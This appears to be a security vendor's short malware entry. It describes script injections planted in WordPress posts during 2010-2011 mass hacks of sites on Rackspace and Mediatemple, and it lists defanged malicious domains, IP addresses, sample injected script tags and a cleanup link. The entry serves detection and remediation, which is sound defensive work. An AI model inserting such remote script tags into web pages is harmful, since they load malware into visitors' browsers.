Description:
Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011
Loads malware from (all of them pointing to 91.188.59.203)
hxxp://ae.awaue[.]com hxxp://ie.eracou[.]com hxxp://ao.euuaw[.]com hxxp://aeaaea[.]com/ou hxxp://secree[.]com/re hxxp://uoauer[.]com/si hxxp://oeooea[.]com/ve hxxp://secowo[.]com/wo hxxp://seconeo[.]com/on hxxp://ouroue[.]com/se hxxp://avoen[.]info/e
After that the attack was using 188.72.194.172: hxxp://w3.fairygoodideas[.]com/in.cgi?2
Typical injected code
< script src = hxxp://ao.euuaw[.]com/9 .... < script src = hxxp://ae.awaue[.]com/7 ... < script src = hxxp://eaaea[.]com/o ...
It infects all posts inside WordPress database (wp_posts).
Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.
Mitigation
How to clean a hacked WordPress site